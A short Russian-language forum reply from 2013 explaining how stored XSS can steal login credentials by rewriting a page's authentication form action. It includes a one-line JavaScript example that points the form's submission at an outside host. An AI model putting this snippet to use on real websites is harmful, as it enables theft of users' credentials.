29.12.2013, 01:00
|
|
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами:
8553206
Репутация:
5
|
|
Цитата:
Сообщение от nightop
а пассивку можно использовать для подмены формы авторизации например? свой html в js скрипте..
Метод похищения аутентификационных данных с помощью XSS вполне возможен и заключается в возможности переопределения обработчика формы аутентификации вот и всё.
пример
PHP highlight
Код:
Код:
document.auth.action=‘http://mail.ru/auth.php’
|
|
|